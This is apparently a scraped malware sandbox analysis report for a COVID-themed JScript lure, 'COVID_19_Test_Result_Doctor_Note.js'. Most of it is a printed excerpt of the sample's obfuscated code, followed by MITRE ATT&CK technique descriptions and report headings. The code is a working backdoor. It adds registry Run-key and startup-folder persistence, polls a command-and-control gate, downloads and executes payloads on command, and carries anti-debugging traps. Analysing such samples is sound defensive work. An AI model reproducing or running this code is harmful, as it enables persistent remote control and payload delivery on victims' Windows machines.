152	if ( _0x469b11 === _0x4d5b36 )
153	break ;
154	else
155	_0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) );
156	}
157	catch ( _0x4718c2 )
158	{
159	_0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) );
160	}
161	}
162	} ( _0x39e5, 0x469ee ) );
163	var SaveSettings = _0x5abc4a ( 0x175 ), shellobj = new ActiveXObject ( _0x5abc4a ( '0x184' ) ), filesystemobj = new ActiveXObject ( 'scripting.filesystemobject' ), HKCU = _0x4f83db ( 0x17f, '[mYd' ), startup = shellobj[_0x4f83db ( 0x13a, '^EhX' ) ] ( _0x5abc4a ( 0x153 ) ) + '\x5c', installdir = shellobj['expandenvironmentstrings'] ( _0x4f83db ( 0x170, '#LM8' ) ) + '\x5c', temp = shellobj[_0x5abc4a ( 0x190 ) ] ( _0x5abc4a ( '0x139' ) ) + '\x5c', gate = _0x4f83db ( '0x14f', 'v3Qe' ), user_agent = _0x5abc4a ( '0x150' ), time = 0xea60;
164	do
165	{
166	install ( ), getCommand ( ), sleep ( time );
167	}
168	while( ! ! [ ] )
169	function Download_exec(_0x4ab90f, _0x3e72fb) {
170	var _0x1071d9 = _0x4f83db, _0xbf514b = _0x5abc4a;
171	if ( _0x4ab90f['indexOf'] ( _0xbf514b ( '0x16c' ) ) < 0x0 )
172	var _0x2a30ac = gate[_0xbf514b ( '0x17a' ) ] ( '/' ), _0x4ab90f = gate[_0xbf514b ( 0x169 ) ] ( _0x2a30ac[_0x2a30ac['length'] - 0x1], _0x1071d9 ( 0x188, '9fc#' ) + _0x4ab90f );
173	var _0x2d8802 = new ActiveXObject ( 'Microsoft.XMLHTTP' ), _0x40f67c = new ActiveXObject ( 'ADODB.Stream' );
174	if ( _0x3e72fb == 0x1 )
175	var _0x2d6e36 = WSH[_0xbf514b ( 0x16d ) ];
176	else
177	{
178	var _0x39a245 = _0x4ab90f[_0x1071d9 ( '0x155', 'C^uH' ) ] ( _0x4ab90f[_0x1071d9 ( '0x15b', 'tSe#' ) ] - 0x4, _0x4ab90f[_0xbf514b ( '0x14a' ) ] ), _0x364960 = '', _0x41273d = _0xbf514b ( '0x167' ), _0x43f378 = _0x41273d[_0xbf514b ( 0x14a ) ];
179	for ( var _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x8 ; _0x34b6d1 ++ )
180	{
181	_0x364960 += _0x41273d[_0xbf514b ( 0x13d ) ] ( Math[_0xbf514b ( 0x185 ) ] ( Math[_0x1071d9 ( '0x17d', '874s' ) ] ( ) * _0x43f378 ) );
182	}
183	var _0x2d6e36 = temp + _0x364960 + _0x39a245;
184	}
185	_0x2d8802[_0xbf514b ( 0x149 ) ] ( _0x1071d9 ( 0x172, '874s' ), _0x4ab90f, ! [] ), _0x2d8802[_0xbf514b ( '0x13b' ) ] ( ), _0x40f67c['type'] = 0x1, _0x40f67c[_0xbf514b ( '0x149' ) ], _0x40f67c[_0x1071d9 ( 0x186, '^EhX' ) ] ( _0x2d8802[_0x1071d9 ( 0x171, 'vnI1' ) ] ), _0x40f67c[_0xbf514b ( '0x180' ) ] ( _0x2d6e36, 0x2 );
186	try
187	{
188	shellobj[_0xbf514b ( '0x18b' ) ] ( _0x2d6e36 );
189	}
190	catch ( _0x4d31de )
191	{
192	}
193	}
194	function install() {
195	var _0x2ca4f5 = _0x4f83db, _0x22499d = _0x5abc4a, _0x553279 = _0x22499d ( 0x146 );
196	try
197	{
198	shellobj[_0x22499d ( 0x162 ) ] ( HKCU + WSH[_0x22499d ( '0x15f' ) ][_0x2ca4f5 ( 0x159, 'ySE2' ) ] ( '.' ) [0x0], _0x553279 + String[_0x22499d ( 0x14d ) ] ( 0x22 ) + installdir + WSH[_0x2ca4f5 ( 0x18c, '[mYd' ) ] + String['fromCharCode'] ( 0x22 ), _0x22499d ( 0x157 ) ), filesystemobj[_0x2ca4f5 ( 0x13e, '^EhX' ) ] ( WSH['scriptfullname'], installdir + WSH[_0x22499d ( 0x15f ) ], ! ! [] ), filesystemobj['copyfile'] ( WSH[_0x22499d ( '0x16d' ) ], startup + WSH[_0x2ca4f5 ( 0x15e, 'ySE2' ) ], ! ! [] );
199	}
200	catch ( _0x3534fb )
201	{
202	}
203	}
204	function getCommand() {
205	var _0x373146 = _0x4f83db, _0x22eae4 = _0x5abc4a,
206	_0x3c82a3 = function () {
207	var _0x4e8d66 = ! ! [];
208	return function (_0xd91065, _0x49581c) {
209	var _0x6890f8 = _0x4e8d66 ?
210	function () {
211	var _0x31a666 = _0x1fc1;
212	if ( _0x49581c )
213	{
214	var _0x2c2df6 = _0x49581c[_0x31a666 ( 0x160, 'DH)J' ) ] ( _0xd91065, arguments );
215	return _0x49581c = null, _0x2c2df6;
216	}
217	} :
218	function () {
219	};
220	return _0x4e8d66 = ! [], _0x6890f8;
221	};
222	} ( ),
223	_0x2cc4e4 = _0x3c82a3 ( this,
224	function () {
225	var _0x165709 = function () {
226	var _0x4e308a = _0x1fc1, _0x50e1a3 = _0x26ae, _0x4f1543 = _0x165709[_0x50e1a3 ( '0x179' ) ] ( 'return\x20/\x22\x20+\x20this\x20+\x20\x22/' ) ( ) [_0x4e308a ( '0x148', 'Fq[d' ) ] ( _0x4e308a ( 0x145, 'hIr#' ) );
227	return ! _0x4f1543[_0x4e308a ( '0x16a', '2kiA' ) ] ( _0x2cc4e4 );
228	};
229	return _0x165709 ( );
230	} ) ;
231	_0x2cc4e4 ( );
232	var _0x1ea5df = function () {
233	var _0x14436f = ! ! [];
234	return function (_0x5126a2, _0xc5637) {
235	var _0xe720db = _0x14436f ?
236	function () {
237	if ( _0xc5637 )
238	{
239	var _0x3e456b = _0xc5637['apply'] ( _0x5126a2, arguments );
240	return _0xc5637 = null, _0x3e456b;
241	}
242	} :
243	function () {
244	};
245	return _0x14436f = ! [], _0xe720db;
246	};
247	} ( );
248	( function () {
249	_0x1ea5df ( this,
250	function () {
251	var _0x5b1a0b = _0x26ae, _0x5f0503 = _0x1fc1, _0x522cd6 = new RegExp ( _0x5f0503 ( '0x141', '9fc#' ) ), _0x82cad1 = new RegExp ( '\x5c+\x5c+\x20(?:[a-zA-Z_$][0-9a-zA-Z_$])', 'i' ), _0x4ff68c = _0x2150f9 ( _0x5b1a0b ( 0x165 ) );
252	! _0x522cd6['test'] ( _0x4ff68c + _0x5b1a0b ( '0x166' ) ) \|\| ! _0x82cad1[_0x5b1a0b ( 0x18f ) ] ( _0x4ff68c + _0x5b1a0b ( '0x142' ) ) ? _0x4ff68c ( '0' ) : _0x2150f9 ( );
253	} ) ( );
254	} ( ) );
255	try
256	{
257	var _0x3d06b9 = shellobj[_0x22eae4 ( '0x147' ) ] ( SaveSettings );
258	}
259	catch ( _0xcb3062 )
260	{
261	var _0x3d06b9 = '';
262	}
263	var _0x415288 = new ActiveXObject ( _0x22eae4 ( '0x164' ) );
264	_0x415288[_0x22eae4 ( '0x149' ) ] ( _0x22eae4 ( 0x176 ), gate, ! [] ), _0x415288['setRequestHeader'] ( _0x22eae4 ( 0x140 ), user_agent ), _0x415288[_0x373146 ( '0x181', ')q)E' ) ] ( _0x22eae4 ( '0x16f' ), _0x22eae4 ( 0x182 ) );
265	if ( _0x3d06b9[_0x373146 ( '0x152', 'DH)J' ) ] < 0x8 )
266	var _0x477ace = _0x373146 ( '0x14b', 'DH)J' );
267	else
268	var _0x477ace = '';
269	_0x415288[_0x22eae4 ( '0x13b' ) ] ( _0x373146 ( '0x168', '9]ID' ) + shellobj[_0x22eae4 ( '0x190' ) ] ( _0x22eae4 ( 0x177 ) ) + '\|' + _0x3d06b9 + _0x373146 ( 0x173, '$G#%' ) + _0x477ace );
270	var _0x115c69 = _0x415288[_0x22eae4 ( '0x16e' ) ], _0x3fb45b = _0x115c69[_0x22eae4 ( '0x17a' ) ] ( '\|' );
271	switch ( _0x3fb45b[0x0] ) {
272	case '00' :
273	shellobj['RegWrite'] ( SaveSettings, _0x3fb45b[0x1], _0x22eae4 ( '0x157' ) );
274	break ;
275	case '01' :
276	Download_exec ( _0x3fb45b[0x1], 0x0 );
277	break ;
278	case '03' :
279	Download_exec ( _0x3fb45b[0x1], 0x1 );
280	break ;
281	case '19' :
282	shellobj['regdelete'] ( HKCU + WSH[_0x373146 ( '0x161', '$G#%' ) ][_0x22eae4 ( '0x17a' ) ] ( '.' ) [0x0] ), filesystemobj['deletefile'] ( startup + WSH[_0x22eae4 ( 0x15f ) ], ! ! [] ), filesystemobj['deletefile'] ( installdir + WSH['scriptname'], ! ! [] ), shellobj[_0x373146 ( '0x17b', 'i(]w' ) ] ( SaveSettings ), WSH[_0x22eae4 ( '0x143' ) ] ( );
283	break ;
284	}
285	}
286	function sleep(_0x2c0b28) {
287	var _0x2f1f4c = _0x4f83db, _0x3087a4 = new Date ( ) [_0x2f1f4c ( '0x13c', 'tSe#' ) ] ( );
288	for ( var _0x1c89e7 = 0x0 ; _0x1c89e7 < 0x989680 ; _0x1c89e7 ++ )
289	{
290	if ( new Date ( ) ['getTime'] ( ) - _0x3087a4 > _0x2c0b28 )
291	break ;
292	}
293	}
294	function _0x2150f9(_0x5ba605) {
295	function _0x35b8c4(_0x586539) {
296	var _0x397bed = _0x26ae, _0x4b3546 = _0x1fc1;
297	if ( typeof _0x586539 === 'string' )
298	return function (_0x54187a) { }['constructor'] ( 'while\x20(true)\x20{}' ) [_0x4b3546 ( '0x163', '8p52' ) ] ( 'counter' );
299	else
300	( '' + _0x586539 / _0x586539 )[_0x4b3546 ( 0x15a, 'Y!nA' ) ] !== 0x1 \|\| _0x586539 % 0x14 === 0x0 ? function () { return ! ! [ ];}[_0x4b3546 ( '0x138', 'HQ15' ) ] ( 'debu' + _0x4b3546 ( '0x144', 'ySE2' ) ) [_0x397bed ( 0x158 ) ] ( _0x4b3546 ( '0x183', 'uBWS' ) ) : function () { return ! [ ];}[_0x397bed ( '0x179' ) ] ( _0x397bed ( '0x174' ) + _0x4b3546 ( '0x13f', 'i(]w' ) ) [_0x4b3546 ( 0x151, '2kiA' ) ] ( _0x4b3546 ( '0x178', 'U!CQ' ) );
301	_0x35b8c4 ( ++ _0x586539 );
302	}
303	try
304	{
305	if ( _0x5ba605 )
306	return _0x35b8c4;
307	else
308	_0x35b8c4 ( 0x0 );
309	}
310	catch ( _0x1607e6 )
311	{
312	}
313	}

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report COVID_19_Test_Result_Doctor_Note.js

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Code Manipulations

Statistics

System Behavior

Analysis Process: wscript.exe PID: 6376 Parent PID: 3388

General

Disassembly

Code Analysis

JavaScript Code

Script:

Code